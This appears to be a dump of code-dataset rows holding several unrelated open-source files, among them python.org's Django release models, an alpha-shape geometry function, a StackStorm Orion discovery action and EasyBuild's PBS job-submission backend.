db_index=True,
help_text="Boolean to denote pre-release/beta/RC versions",
)
show_on_download_page = models.BooleanField(
default=True,
db_index=True,
help_text="Whether or not to show this release on the main /downloads/ page",
)
release_date = models.DateTimeField(default=timezone.now)
release_page = models.ForeignKey(Page, related_name='release', blank=True, null=True)
release_notes_url = models.URLField('Release Notes URL', blank=True)
content = MarkupField(default_markup_type=DEFAULT_MARKUP_TYPE, default='')
objects = ReleaseManager()
class Meta:
verbose_name = 'Release'
verbose_name_plural = 'Releases'
ordering = ('name', )
get_latest_by = 'release_date'
def __str__(self):
return self.name
def get_absolute_url(self):
if not self.content.raw and self.release_page:
return self.release_page.get_absolute_url()
else:
return reverse('download:download_release_detail', kwargs={'release_slug': self.slug})
def download_file_for_os(self, os_slug):
""" Given an OS slug return the appropriate download file """
try:
file = self.files.get(os__slug=os_slug, download_button=True)
except ReleaseFile.DoesNotExist:
file = None
return file
def files_for_os(self, os_slug):
""" Return all files for this release for a given OS """
files = self.files.filter(os__slug=os_slug).order_by('-name')
return files
def update_supernav():
try:
latest_python2 = Release.objects.latest_python2()
except Release.DoesNotExist:
latest_python2 = None
try:
latest_python3 = Release.objects.latest_python3()
except Release.DoesNotExist:
latest_python3 = None
python_files = []
for o in OS.objects.all():
data = {
'os': o,
'python2': None,
'python3': None,
}
if latest_python2:
data['python2'] = latest_python2.download_file_for_os(o.slug)
if latest_python3:
data['python3'] = latest_python3.download_file_for_os(o.slug)
python_files.append(data)
content = render_to_string('downloads/supernav.html', {
'latest_python2': latest_python2,
'latest_python3': latest_python3,
'python_files': python_files,
})
box = Box.objects.get(label='supernav-python-downloads')
box.content = content
box.save()
# Update latest Sources box on Download landing page
if latest_python2:
latest_python2_source = latest_python2.download_file_for_os('source')
else:
latest_python2_source = None
if latest_python3:
latest_python3_source = latest_python3.download_file_for_os('source')
else:
latest_python3_source = None
source_box = Box.objects.get(label='download-sources')
source_content = render_to_string('downloads/download-sources-box.html', {
'latest_python2_source': latest_python2_source,
'latest_python3_source': latest_python3_source,
})
source_box.content = source_content
source_box.save()
def update_homepage_download_box():
try:
latest_python2 = Release.objects.latest_python2()
except Release.DoesNotExist:
latest_python2 = None
try:
latest_python3 = Release.objects.latest_python3()
except Release.DoesNotExist:
latest_python3 = None
content = render_to_string('downloads/homepage-downloads-box.html', {
'latest_python2': latest_python2,
'latest_python3': latest_python3,
})
box = Box.objects.get(label='homepage-downloads')
box.content = content
box.save()
@receiver(post_save, sender=Release)
def promote_latest_release(sender, instance, **kwargs):
""" Promote this release to be the latest if this flag is set """
# Skip in fixtures
if kwargs.get('raw', False):
return
if instance.is_latest:
# Demote all previous instances
Release.objects.filter(
version=instance.version
).exclude(
pk=instance.pk
).update(is_latest=False)
@receiver(post_save, sender=Release)
def purge_fastly_download_pages(sender, instance, **kwargs):
"""
Purge Fastly caches so new Downloads show up more quickly
"""
# Don't purge on fixture loads
if kwargs.get('raw', False):
return
# Only purge on published instances
if instance.is_published:
# Purge our common pages
purge_url('/downloads/')
purge_url('/downloads/latest/python2/')
purge_url('/downloads/latest/python3/')
purge_url('/downloads/mac-osx/')
purge_url('/downloads/source/')
purge_url('/downloads/windows/')
# Purge the release page itself
purge_url(instance.get_absolute_url())
@receiver(post_save, sender=Release)
def update_download_supernav(sender, instance, **kwargs):
""" Update download supernav """
# Skip in fixtures
if kwargs.get('raw', False):
return
if instance.is_published:
update_supernav()
update_homepage_download_box()
class ReleaseFile(ContentManageable, NameSlugModel):
"""
Individual files in a release. If a specific OS/release combo has multiple
versions for example Windows and MacOS 32 vs 64 bit each file needs to be
added separately
"""
os = models.ForeignKey(OS, related_name="releases", verbose_name='OS')
release = models.ForeignKey(Release, related_name="files")
description = models.TextField(blank=True)
is_source = models.BooleanField('Is Source Distribution', default=False)
url = models.URLField('URL', unique=True, db_index=True, help_text="Download URL")
gpg_signature_file = models.URLField(
'GPG SIG URL',
blank=True,
help_text="GPG Signature URL"
)
md5_sum = models.CharField('MD5 Sum', max_length=200, blank=True)
filesize = models.IntegerField(default=0)
download_button = models.BooleanField(default=False, help_text="Use for the supernav download button for this OS")
class Meta:
verbose_name = 'Release File'
verbose_name_plural = 'Release Files'
ordering = ('-release__is_published', 'release__name', 'os__name', 'name')
|
mdiener21/python-geospatial-analysis-cookbook | refs/heads/master | ch08/code/alpha_shape.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############
#
# Code source modified from
# http://blog.thehumangeo.com/2014/05/12/drawing-boundaries-in-python/
#
###############
from shapely import geometry
from shapely.ops import cascaded_union, polygonize
from scipy.spatial import Delaunay
import numpy as np
import math
def alpha_shape(points, alpha):
"""
Compute the alpha shape (concave hull) of a set
of points.
@param points: Iterable container of points.
@param alpha: alpha value to influence the
gooeyness of the border. Smaller numbers
don't fall inward as much as larger numbers.
Too large, and you lose everything!
"""
if len(points) < 4:
# When you have a triangle, there is no sense
# in computing an alpha shape.
return geometry.MultiPoint(list(points)).convex_hull
def add_edge(edges, edge_points, coords, i, j):
"""
Add a line between the i-th and j-th points,
if not in the list already
"""
if (i, j) in edges or (j, i) in edges:
# already added
return
edges.add((i, j))
edge_points.append(coords[[i, j]])
coords = np.array([point.coords[0] for point in points])
tri = Delaunay(coords)
edges = set()
edge_points = []
# loop over triangles:
# ia, ib, ic = indices of corner points of the
# triangle
for ia, ib, ic in tri.vertices:
pa = coords[ia]
pb = coords[ib]
pc = coords[ic]
# Lengths of sides of triangle
a = math.sqrt((pa[0] - pb[0]) ** 2 + (pa[1] - pb[1]) ** 2)
b = math.sqrt((pb[0] - pc[0]) ** 2 + (pb[1] - pc[1]) ** 2)
c = math.sqrt((pc[0] - pa[0]) ** 2 + (pc[1] - pa[1]) ** 2)
# Semiperimeter of triangle
s = (a + b + c) / 2.0
# Area of triangle by Heron's formula
area = math.sqrt(s * (s - a) * (s - b) * (s - c))
circum_r = a * b * c / (4.0 * area)
# Here's the radius filter.
# print circum_r
if circum_r < 1.0 / alpha:
add_edge(edges, edge_points, coords, ia, ib)
add_edge(edges, edge_points, coords, ib, ic)
add_edge(edges, edge_points, coords, ic, ia)
m = geometry.MultiLineString(edge_points)
triangles = list(polygonize(m))
return cascaded_union(triangles), edge_points
|
singingwolfboy/invoke | refs/heads/master | tests/_support/simple_ns_list.py | 5 | from invoke import task, Collection
@task
def z_toplevel():
pass
@task
def subtask():
pass
ns = Collection(z_toplevel, Collection('a', Collection('b', subtask)))
|
gurneyalex/odoo | refs/heads/13.0-improve_sale_coupon_perf | addons/website_event_sale/__init__.py | 1315 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import controllers
from . import models
|
safwanrahman/linuxdesh | refs/heads/master | kitsune/sumo/tests/test_tests.py | 23 | """Tests for the TestCase base class and any other utils that come along."""
from django.core.cache import cache
from nose.tools import eq_
from kitsune.sumo.tests import TestCase
CACHE_KEY = 'sumo_cache_flushing_test'
class CacheFlushingTests(TestCase):
"""Tests that make sure SUMO's base TestCase flushes memcached.
This whole class comprises one conceptual test in two parts, which must
run in the listed order.
"""
def test_1_store(self):
"""Store a value in the cache."""
cache.set(CACHE_KEY, 'smoo')
def test_2_assert(self):
"""Assert the value stored above isn't there."""
eq_(None, cache.get(CACHE_KEY))
|
sakisbl/OpenSesameOnline | refs/heads/master | webapp/os_online/experimenter/managers.py | 1 | # -*- coding: ascii -*-
"""
#==============================================================================
#title :view.py
#description :This module implements managers for the Experiment Tokens.
ActiveTokenManager will fetch the tokens that are not yet
invalidated. (But not the permalink)
ExpiredTokenManager will fetch the expired tokens
#author :OpenSesame group of GipHouse 2014, Radboud University
#date :2014-06-16
#version :0.2
#notes :
#python_version :2.7
#python_version :1.6
#==============================================================================
"""
from django.db.models import Manager, Q
#pylint: disable=too-many-public-methods
class ActiveTokenManager(Manager):
""" Manager for active tokens (not expired).
"""
def get_queryset(self):
""" Gets the set of active tokens (excludes the permalink)"""
queryset = super(ActiveTokenManager, self).get_queryset()
return queryset.filter(Q(used=False), Q(perma_token=False))
class ExpiredTokenManager(Manager):
""" Manager for expired tokens.
"""
def get_queryset(self):
""" Gets the set of expired tokens"""
queryset = super(ExpiredTokenManager, self).get_queryset()
return queryset.filter(Q(used=True))
|
tonybaloney/st2contrib | refs/heads/master | packs/orion/actions/start_discovery.py | 3 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from lib.actions import OrionBaseAction
from lib.utils import send_user_error, only_one
class StartDiscovery(OrionBaseAction):
def run(self,
name,
poller,
snmp_communities,
nodes=None,
subnets=None,
ip_ranges=None,
no_icmp_only=True,
auto_import=False):
"""
Create and Start Discovery process in Orion.
Returns:
- ProfileID that was created (or error from Orion).
"""
results = {}
# Orion must have the un-used varabiles to be certain values.
BulkList = None
IpRanges = []
Subnets = None
results['label'] = self.connect()
if not only_one(nodes, subnets, ip_ranges):
msg = "Need only one out of nodes, ip_ranges or subnets!"
send_user_error(msg)
raise ValueError(msg)
if nodes is not None:
BulkList = []
for node in nodes:
BulkList.append({'Address': node})
elif ip_ranges is not None:
for ip_range in ip_ranges:
(start_ip, end_ip) = ip_range.split(':')
IpRanges.append({'StartAddress': start_ip,
'EndAddress': end_ip})
elif subnets is not None:
Subnets = []
for subnet in subnets:
(SubnetIP, SubnetMask) = subnet.split('/')
Subnets.append({'SubnetIP': SubnetIP,
'SubnetMask': SubnetMask})
CredID_order = 1
CredIDs = []
for snmp in snmp_communities:
CredIDs.append(
{'CredentialID': self.get_snmp_cred_id(snmp),
'Order': CredID_order}
)
CredID_order += 1
CorePluginConfiguration = self.invoke('Orion.Discovery',
'CreateCorePluginConfiguration',
{'BulkList': BulkList,
'IpRanges': IpRanges,
'Subnets': Subnets,
'Credentials': CredIDs,
'WmiRetriesCount': 0,
'WmiRetryIntervalMiliseconds':
1000})
# engineID if happens to be None, default to the primary (aka 1).
if poller is not None:
engineID = self.get_engine_id(poller)
else:
engineID = 1
self.logger.info(
"Adding '{}' Discovery profile to Orion: {}".format(
name, results['label']))
disco = self.invoke('Orion.Discovery', 'StartDiscovery',
{
'Name': name,
'EngineId': engineID,
'JobTimeoutSeconds': 3600,
'SearchTimeoutMiliseconds': 2000,
'SnmpTimeoutMiliseconds': 2000,
'SnmpRetries': 4,
'RepeatIntervalMiliseconds': 1800,
'SnmpPort': 161,
'HopCount': 0,
'PreferredSnmpVersion': 'SNMP2c',
'DisableIcmp': no_icmp_only,
'AllowDuplicateNodes': False,
'IsAutoImport': auto_import,
'IsHidden': False,
'PluginConfigurations': [
{'PluginConfigurationItem':
CorePluginConfiguration}
]
})
# FIX ME Check job created....
return disco
|
Caylo/easybuild-framework | refs/heads/master | easybuild/tools/job/pbs_python.py | 2 | ##
# Copyright 2012-2016 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Interface module to TORQUE (PBS).
:author: Stijn De Weirdt (Ghent University)
:author: Toon Willems (Ghent University)
:author: Kenneth Hoste (Ghent University)
"""
from distutils.version import LooseVersion
import os
import re
import tempfile
from vsc.utils import fancylogger
from easybuild.tools.build_log import EasyBuildError, print_msg
from easybuild.tools.config import build_option
from easybuild.tools.job.backend import JobBackend
from easybuild.tools.utilities import only_if_module_is_available
_log = fancylogger.getLogger('pbs_python', fname=False)
# extend paramater should be 'NULL' in some functions because this is required by the python api
NULL = 'NULL'
# list of known hold types
KNOWN_HOLD_TYPES = []
try:
import pbs
from PBSQuery import PBSQuery
KNOWN_HOLD_TYPES = [pbs.USER_HOLD, pbs.OTHER_HOLD, pbs.SYSTEM_HOLD]
except ImportError as err:
_log.debug("Failed to import pbs/PBSQuery from pbs_python."
" Silently ignoring, this is a real issue only when pbs_python is used as backend for --job")
class PbsPython(JobBackend):
"""
Manage PBS server communication and create `PbsJob` objects.
"""
# pbs_python 4.1.0 introduces the pbs.version variable we rely on
REQ_VERSION = '4.1.0'
# _check_version is called by __init__, so guard it (too) with the decorator
@only_if_module_is_available('pbs', pkgname='pbs_python')
def _check_version(self):
"""Check whether pbs_python version complies with required version."""
version_regex = re.compile('pbs_python version (?P<version>.*)')
res = version_regex.search(pbs.version)
if res:
version = res.group('version')
if LooseVersion(version) < LooseVersion(self.REQ_VERSION):
raise EasyBuildError("Found pbs_python version %s, but version %s or more recent is required",
version, self.REQ_VERSION)
else:
raise EasyBuildError("Failed to parse pbs_python version string '%s' using pattern %s",
pbs.version, version_regex.pattern)
def __init__(self, *args, **kwargs):
"""Constructor."""
pbs_server = kwargs.pop('pbs_server', None)
super(PbsPython, self).__init__(*args, **kwargs)
self.pbs_server = pbs_server or build_option('job_target_resource') or pbs.pbs_default()
self.conn = None
self._ppn = None
def init(self):
"""
Initialise the job backend.
Connect to the PBS server & reset list of submitted jobs.
"""
self.connect_to_server()
self._submitted = []
def connect_to_server(self):
"""Connect to PBS server, set and return connection."""
if not self.conn:
self.conn = pbs.pbs_connect(self.pbs_server)
return self.conn
def queue(self, job, dependencies=frozenset()):
"""
Add a job to the queue.
:param dependencies: jobs on which this job depends.
"""
if dependencies:
job.add_dependencies(dependencies)
job._submit()
self._submitted.append(job)
def complete(self):
"""
Complete a bulk job submission.
Release all user holds on submitted jobs, and disconnect from server.
"""
for job in self._submitted:
if job.has_holds():
self.log.info("releasing user hold on job %s" % job.jobid)
job.release_hold()
self.disconnect_from_server()
# print list of submitted jobs
submitted_jobs = '; '.join(["%s (%s): %s" % (job.name, job.module, job.jobid) for job in self._submitted])
print_msg("List of submitted jobs (%d): %s" % (len(self._submitted), submitted_jobs), log=self.log)
# determine leaf nodes in dependency graph, and report them
all_deps = set()
for job in self._submitted:
all_deps = all_deps.union(job.deps)
leaf_nodes = []
for job in self._submitted:
if job.jobid not in all_deps:
leaf_nodes.append(str(job.jobid).split('.')[0])
self.log.info("Job ids of leaf nodes in dep. graph: %s" % ','.join(leaf_nodes))
def disconnect_from_server(self):
"""Disconnect current connection."""
pbs.pbs_disconnect(self.conn)
self.conn = None
def _get_ppn(self):
"""Guess PBS' `ppn` value for a full node."""
# cache this value as it's not likely going to change over the
# `eb` script runtime ...
if not self._ppn:
pq = PBSQuery()
node_vals = pq.getnodes().values() # only the values, not the names
interesting_nodes = ('free', 'job-exclusive',)
res = {}
for np in [int(x['np'][0]) for x in node_vals if x['state'][0] in interesting_nodes]:
res.setdefault(np, 0)
res[np] += 1
if not res:
raise EasyBuildError("Could not guess the ppn value of a full node because " +
"there are no free or job-exclusive nodes.")
# return most frequent
freq_count, freq_np = max([(j, i) for i, j in res.items()])
self.log.debug("Found most frequent np %s (%s times) in interesting nodes %s" % (freq_np, freq_count, interesting_nodes))
self._ppn = freq_np
return self._ppn
ppn = property(_get_ppn)
def make_job(self, script, name, env_vars=None, hours=None, cores=None):
"""Create and return a `PbsJob` object with the given parameters."""
return PbsJob(self, script, name, env_vars=env_vars, hours=hours, cores=cores, conn=self.conn, ppn=self.ppn)
class PbsJob(object):
"""Interaction with TORQUE"""
def __init__(self, server, script, name, env_vars=None,
hours=None, cores=None, conn=None, ppn=None):
"""
create a new Job to be submitted to PBS
env_vars is a dictionary with key-value pairs of environment variables that should be passed on to the job
hours and cores should be integer values.
hours can be 1 - (max walltime), cores depends on which cluster it is being run.
"""
self.log = fancylogger.getLogger(self.__class__.__name__, fname=False)
self._server = server
self.script = script
if env_vars:
self.env_vars = env_vars.copy()
else:
self.env_vars = {}
self.name = name
try:
self.pbsconn = self._server.connect_to_server()
except Exception, err:
raise EasyBuildError("Failed to connect to the default pbs server: %s", err)
# setup the resources requested
# validate requested resources!
max_walltime = build_option('job_max_walltime')
if hours is None:
hours = max_walltime
if hours > max_walltime:
self.log.warn("Specified %s hours, but this is impossible. (resetting to %s hours)" % (hours, max_walltime))
hours = max_walltime
if ppn is None:
max_cores = server.ppn
else:
max_cores = ppn
if cores is None:
cores = max_cores
if cores > max_cores:
self.log.warn("number of requested cores (%s) was greater than available (%s) " % (cores, max_cores))
cores = max_cores
# only allow cores and hours for now.
self.resources = {
'walltime': '%s:00:00' % hours,
'nodes': '1:ppn=%s' % cores,
}
# don't specify any queue name to submit to, use the default
self.queue = None
# job id of this job
self.jobid = None
# list of dependencies for this job
self.deps = []
# list of holds that are placed on this job
self.holds = []
def __str__(self):
"""Return the job ID as a string."""
return (str(self.jobid) if self.jobid is not None
else repr(self))
def add_dependencies(self, jobs):
"""
Add dependencies to this job.
Argument `jobs` is a sequence of `PbsJob` objects.
"""
self.deps.extend(jobs)
def _submit(self):
"""Submit the jobscript txt, set self.jobid"""
txt = self.script
self.log.debug("Going to submit script %s" % txt)
# Build default pbs_attributes list
pbs_attributes = pbs.new_attropl(3)
pbs_attributes[0].name = pbs.ATTR_N # Job_Name
pbs_attributes[0].value = self.name
output_dir = build_option('job_output_dir')
pbs_attributes[1].name = pbs.ATTR_o
pbs_attributes[1].value = os.path.join(output_dir, '%s.o$PBS_JOBID' % self.name)
pbs_attributes[2].name = pbs.ATTR_e
pbs_attributes[2].value = os.path.join(output_dir, '%s.e$PBS_JOBID' % self.name)
# set resource requirements
resource_attributes = pbs.new_attropl(len(self.resources))
idx = 0
for k, v in self.resources.items():
resource_attributes[idx].name = pbs.ATTR_l # Resource_List
resource_attributes[idx].resource = k
resource_attributes[idx].value = v
idx += 1
pbs_attributes.extend(resource_attributes)
# add job dependencies to attributes
if self.deps:
deps_attributes = pbs.new_attropl(1)
deps_attributes[0].name = pbs.ATTR_depend
deps_attributes[0].value = ",".join(["afterany:%s" % dep.jobid for dep in self.deps])
pbs_attributes.extend(deps_attributes)
self.log.debug("Job deps attributes: %s" % deps_attributes[0].value)
# submit job with (user) hold
hold_attributes = pbs.new_attropl(1)
hold_attributes[0].name = pbs.ATTR_h
hold_attributes[0].value = pbs.USER_HOLD
pbs_attributes.extend(hold_attributes)
self.holds.append(pbs.USER_HOLD)
self.log.debug("Job hold attributes: %s" % hold_attributes[0].value)
# add a bunch of variables (added by qsub)
# also set PBS_O_WORKDIR to os.getcwd()
os.environ.setdefault('WORKDIR', os.getcwd())
defvars = ['MAIL', 'HOME', 'PATH', 'SHELL', 'WORKDIR']
pbsvars = ["PBS_O_%s=%s" % (x, os.environ.get(x, 'NOTFOUND_%s' % x)) for x in defvars]
# extend PBS variables with specified variables
pbsvars.extend(["%s=%s" % (name, value) for (name, value) in self.env_vars.items()])
variable_attributes = pbs.new_attropl(1)
variable_attributes[0].name = pbs.ATTR_v # Variable_List
variable_attributes[0].value = ",".join(pbsvars)
pbs_attributes.extend(variable_attributes)
self.log.debug("Job variable attributes: %s" % variable_attributes[0].value)
# mail settings
mail_attributes = pbs.new_attropl(1)
mail_attributes[0].name = pbs.ATTR_m # Mail_Points
mail_attributes[0].value = 'n' # disable all mail
pbs_attributes.extend(mail_attributes)
self.log.debug("Job mail attributes: %s" % mail_attributes[0].value)
fh, scriptfn = tempfile.mkstemp()
f = os.fdopen(fh, 'w')
self.log.debug("Writing temporary job script to %s" % scriptfn)
f.write(txt)
f.close()
self.log.debug("Going to submit to queue %s" % self.queue)
# job submission sometimes fails without producing an error, e.g. when one of the dependency jobs has already finished
# when that occurs, None will be returned by pbs_submit as job id
jobid = pbs.pbs_submit(self.pbsconn, pbs_attributes, scriptfn, self.queue, NULL)
is_error, errormsg = pbs.error()
if is_error or jobid is None:
raise EasyBuildError("Failed to submit job script %s (job id: %s, error %s)", scriptfn, jobid, errormsg)
else:
self.log.debug("Succesful job submission returned jobid %s" % jobid)
self.jobid = jobid
os.remove(scriptfn)
def set_hold(self, hold_type=None):
"""Set hold on job of specified type."""
# we can't set this default for hold_type in function signature,
# because we need to be able to load this module even when the pbs module is not available
if hold_type is None:
hold_type = pbs.USER_HOLD
# only set hold if it wasn't set before
if hold_type not in self.holds:
if hold_type not in KNOWN_HOLD_TYPES:
raise EasyBuildError("set_hold: unknown hold type: %s (supported: %s)", hold_type, KNOWN_HOLD_TYPES)
# set hold, check for errors, and keep track of this hold
ec = pbs.pbs_holdjob(self.pbsconn, self.jobid, hold_type, NULL)
is_error, errormsg = pbs.error()
if is_error or ec:
raise EasyBuildError("Failed to set hold of type %s on job %s (is_error: %s, exit code: %s, msg: %s)",
hold_type, self.jobid, is_error, ec, errormsg)
else:
self.holds.append(hold_type)
else:
self.log.warning("Hold type %s was already set for %s" % (hold_type, self.jobid))
def release_hold(self, hold_type=None):
"""Release hold on job of specified type."""
# we can't set this default for hold_type in function signature,
# because we need to be able to load this module even when the pbs module is not available
if hold_type is None:
hold_type = pbs.USER_HOLD
# only release hold if it was set
if hold_type in self.holds:
if hold_type not in KNOWN_HOLD_TYPES:
raise EasyBuildError("release_hold: unknown hold type: %s (supported: %s)", hold_type, KNOWN_HOLD_TYPES)
# release hold, check for errors, remove from list of holds
ec = pbs.pbs_rlsjob(self.pbsconn, self.jobid, hold_type, NULL)
self.log.debug("Released hold of type %s for job %s" % (hold_type, self.jobid))
is_error, errormsg = pbs.error()
if is_error or ec:
raise EasyBuildError("Failed to release hold type %s on job %s (is_error: %s, exit code: %s, msg: %s)",
hold_type, self.jobid, is_error, ec, errormsg)
else:
self.holds.remove(hold_type)
else:
self.log.warning("No hold type %s was set for %s, so skipping hold release" % (hold_type, self.jobid))
def has_holds(self):
"""Return whether this job has holds or not."""
return bool(self.holds)
def state(self):
"""
Return the state of the job
State can be 'not submitted', 'running', 'queued' or 'finished',
"""
state = self.info(types=['job_state', 'exec_host'])
if state is None:
if self.jobid is None:
return 'not submitted'
else:
return 'finished'
jid = state['id']
jstate = state.get('job_state', None)
def get_uniq_hosts(txt, num=None):
"""
- txt: format: host1/cpuid+host2/cpuid
- num: number of nodes to return (default: all)
"""
if num is None:
num = -1
res = []
for h_c in txt.split('+'):
h = h_c.split('/')[0]
if h in res:
continue
res.append(h)
return res[:num]
ehosts = get_uniq_hosts(state.get('exec_host', ''), 1)
self.log.debug("Jobid %s jid %s state %s ehosts %s (%s)" % (self.jobid, jid, jstate, ehosts, state))
if jstate == 'Q':
return 'queued'
else:
return 'running'
def info(self, types=None):
"""
Return jobinfo
"""
if not self.jobid:
self.log.debug("no jobid, job is not submitted yet?")
return None
# convert single type into list
if type(types) is str:
types = [types]
self.log.debug("Return info types %s" % types)
# create attribute list to query pbs with
if types is None:
jobattr = NULL
else:
jobattr = pbs.new_attrl(len(types))
for idx, attr in enumerate(types):
jobattr[idx].name = attr
jobs = pbs.pbs_statjob(self.pbsconn, self.jobid, jobattr, NULL)
if len(jobs) == 0:
# no job found, return None info
res = None
self.log.debug("No job found. Wrong id %s or job finished? Returning %s" % (self.jobid, res))
return res
elif len(jobs) == 1:
self.log.debug("Request for jobid %s returned one result %s" % (self.jobid, jobs))
else:
raise EasyBuildError("Request for jobid %s returned more then one result %s", self.jobid, jobs)
# only expect to have a list with one element
j = jobs[0]
# convert attribs into useable dict
job_details = dict([(attrib.name, attrib.value) for attrib in j.attribs])
# manually set 'id' attribute
job_details['id'] = j.name
self.log.debug("Found jobinfo %s" % job_details)
return job_details
def remove(self):
"""Remove the job with id jobid"""
result = pbs.pbs_deljob(self.pbsconn, self.jobid, '') # use empty string, not NULL
if result:
raise EasyBuildError("Failed to delete job %s: error %s", self.jobid, result)
else:
self.log.debug("Succesfully deleted job %s" % self.jobid)
|
Subsets and Splits